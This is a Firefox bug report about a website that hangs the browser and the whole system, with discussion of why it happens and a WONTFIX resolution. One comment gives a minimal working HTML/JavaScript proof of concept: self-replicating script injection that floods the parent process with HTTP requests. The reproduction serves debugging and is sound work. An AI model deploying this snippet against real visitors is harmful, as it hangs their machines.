Closed Bug 1514413 Opened 6 years ago Closed 5 years ago

Opening http://datakitchen.tumblr.com completely hangs system, causes high disk I/O

Categories

(Core :: Networking, defect, P3)

64 Branch
defect

Tracking

()

RESOLVED WONTFIX
Performance Impact medium

People

(Reporter: 13hurdw, Assigned: mayhemer)

References

(Blocks 1 open bug, )

Details

(Keywords: csectype-dos, perf:resource-use, Whiteboard: [necko-triaged])

Attachments

(2 files, 1 obsolete file)

Attached image datakitchen.tumblr.com hanging Firefox (deleted) —
Firefox 64 on Ubuntu 18.04.1 LTS

To reproduce:

- http://datakitchen.tumblr.com/

Actual results:
Visiting the site causes Firefox to hang completely and the entire system to slow down, heavy disk I/O for easily ~30 minutes. Eventually forced to REISUB to get back into my machine.
This site is basically causing a denial-of-service condition.

Reproduced on two different Ubuntu machines and a clean profile.


Expected: opens like a normal website. I/O should be throttled.
I could reproduce this issue on 

User Agent 	Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
Component: Untriaged → JavaScript Engine
Product: Firefox → Core

I just reproduced this on my machine as well. Basically DOSed the browser. Content is actually responsive here, but chrome is not - the close-window button, the back button, and chrome buttons on other windows no longer worked after this.

Seems like a serious issue.

Marking P1.

Priority: -- → P1

Nicolas, could you take a look at this?

Flags: needinfo?(nicolas.b.pierron)

Kannan, would it be possible to get a profile, even a perf profile if the Gecko profiler is not responding?
From the description of this bug I am not sure if this belongs to the JavaScript category.

Flags: needinfo?(nicolas.b.pierron) → needinfo?(kvijayan)
Keywords: hang
Whiteboard: [qf]
Whiteboard: [qf] → [qf:p1:pageload]
Whiteboard: [qf:p1:pageload] → [qf:p2:resource]

I don't think it's likely JS either. There's nothing specifically in Spidermonkey that would spur heavy disk IO. If the site is using local storage or some other filestore-touching API heavily, then the throttling responsibility would be on the part of the subsystem involved.

If the browser is hanging then the gecko profiler will not be usable. This is probably better pursued with a system profiler on the binary to identify the subsystem.

Still not ideal as it seems it's an extreme system slowdown, but it has a better chance of working effectively than the Gecko Profiler route.

Flags: needinfo?(kvijayan)
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → General
Ever confirmed: true

Here is a profile I managed to grab from the Gecko Profiler before the browser became unresponsive http://bit.ly/2XnigXd. Using latest Firefox Nightly on Win 10 x64.

Assignee: nobody → violet.bugreport
Component: General → Networking

I've found the problem.

A minimal example to reproduce the bug would be:

<head>
</head>
<body>
<script>
h = document.getElementsByTagName("head")[0];
let i = 0;
function evilimpl() {
    s = document.createElement("script");
    s.type = "text/javascript";
    s.async = true;
    s.src = "http://127.0.0.1/echo_evil.js?" + i;
    i++;
    h.appendChild(s);
}

function evil() {
  for (let i = 0; i < 5; ++i) {
    evilimpl();
  }
}
evil();
</script>
</body>

Then use a server like nginx to serve the echo_evil.js with content

evil()

Logging shows the content process is issuing far more http request than the parent can handle in this case. I may need some time to figure out what is going on here...

Blocks: eviltraps

If you need any help from networking team, please let me know. Thanks.

Whiteboard: [qf:p2:resource] → [qf:p2:resource][necko-triaged]
Attachment #9051900 - Attachment is obsolete: true

The hanging is caused by a flood of countless HttpChannelParent::DoAsyncOpen() that make the event loop at main thread of the parent process almost useless.

See my attached file. Actually this can be reproduced by any JavsScript code that requires a network request, such as <script>, <img>, XMLHttpRequest, etc.

I couldn't find throttling attempt at netwerk/protocol/http to restrict how many Http request a child can send to the parent. So I think a possible solution is to add some throttling code to netwerk/protocol/http/HttpChannelChild.cpp, e.g. HttpChannelChild::AsyncOpen(). If the content process is issuing too many http request in a short period, then reject them. So that we can protect the parent process from being flooded by those events.

What do you think about this? I'm not sure if it's the best solution since I'm unfamiliar with the networking codebase.

Flags: needinfo?(kershaw)

(In reply to violet.bugreport from comment #11)

The hanging is caused by a flood of countless HttpChannelParent::DoAsyncOpen() that make the event loop at main thread of the parent process almost useless.

See my attached file. Actually this can be reproduced by any JavsScript code that requires a network request, such as <script>, <img>, XMLHttpRequest, etc.

I couldn't find throttling attempt at netwerk/protocol/http to restrict how many Http request a child can send to the parent. So I think a possible solution is to add some throttling code to netwerk/protocol/http/HttpChannelChild.cpp, e.g. HttpChannelChild::AsyncOpen(). If the content process is issuing too many http request in a short period, then reject them. So that we can protect the parent process from being flooded by those events.

What do you think about this? I'm not sure if it's the best solution since I'm unfamiliar with the networking codebase.

I think it would be risky to throttle creating Http requests, since this might break real web sites.

Dragana, I think we've encountered some thing like this before, but I can't find the bug number right now. Do we already have a conclusion on how to deal with this kind of problem?

Flags: needinfo?(kershaw) → needinfo?(dd.mozilla)

I think it would be risky to throttle creating Http requests, since this might break real web sites.

It makes sense. However, we can still locally enqueue the requests if there are too many pending ones, then send them to the parent in the future.

In a nutshell, there should be a mechanism to avoid flooding the parent, otherwise some bad websites might use it to force a user to read their page when the whole browser is unresponsive. Chrome doesn't have this problem.

(In reply to violet.bugreport from comment #13)

Chrome doesn't have this problem.

When I just loaded the page in Chrome it in fact caused quite some problems for Chrome as well. You can continue to scroll the page smoothly and you can continue to use the menus and open new tabs. But I could not close the tab with the evil page in it any more. Closing Chrome makes the UI disappear, but the Chrome Helper process keeps running at 100% CPU until you kill it. Only then Chrome is able to shut down.

(In reply to Nils Ohlmeier [:drno] from comment #14)

(In reply to violet.bugreport from comment #13)

Chrome doesn't have this problem.

When I just loaded the page in Chrome it in fact caused quite some problems for Chrome as well. You can continue to scroll the page smoothly and you can continue to use the menus and open new tabs. But I could not close the tab with the evil page in it any more. Closing Chrome makes the UI disappear, but the Chrome Helper process keeps running at 100% CPU until you kill it. Only then Chrome is able to shut down.

Chromium has said they wont fix anything with this - https://bugs.chromium.org/p/chromium/issues/detail?id=915405#c2

Unassigned since it's likely a WONTFIX...

Assignee: violet.bugreport → nobody
Priority: P1 → P3

(In reply to violet.bugreport from comment #16)

Unassigned since it's likely a WONTFIX...

This should be still be higher priority for FF
The effect is worse in FF (total system DoS) than in Chrome

Just because chromium said they wontfix does not mean Mozilla should.

Just because chromium said they wontfix does not mean Mozilla should.

This is not my reason to say it's possibly a WONTFIX. Please read Comment 12 from networking team, the issue was already known, but it doesn't seem to have any fix. That's why marking it P1 doesn't make sense. (P1 means it will be fixed in current release cycle)

Assignee: nobody → honzab.moz

Still reproducible with that page. Each new script request is for a different URL. I/O comes from the cache as we use a separate file for each URL. Throttling of requests on the child process is not a proper fix. This is more a general scheduling issue, but not just that. If a user wants to close the offending tab, the whole chain of events coming from the interaction to close the tab should have a high enough priority to skip over the long tail of stuff pending in the main thread queue.

Tested with Release and Nightly (66, 68).

There are two things that concern me:

  • memory consumption of the parent process and the content process grow, more or less exponentially
  • the IO is mostly the same all the time

These two factors will make a system running on a lower-end hardware swap and make it unusable relatively quickly.

This one attack (if the page really tries to attack) is a chain reaction schema. Detecting it and preventing when it really becomes evil may be quite tricky. Any heuristic (preferably on the parent process, rather than the child process) we may invent for chain reaction will not apply to a single content loop quickly creating requests.

Only option seems to be a general (quite high, tho) limit for requests per time. If it goes over the threshold we start immediately rejecting them (canceling them). this is always very sensitive thing to do and may break actual sites, so I tend to not implementing any such thing.

WONTFIXing, but I'll keep this in mind.

Status: NEW → RESOLVED
Closed: 5 years ago
Flags: needinfo?(dd.mozilla)
Keywords: hangcsectype-dos
Resolution: --- → WONTFIX
Performance Impact: --- → P2
Whiteboard: [qf:p2:resource][necko-triaged] → [necko-triaged]
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: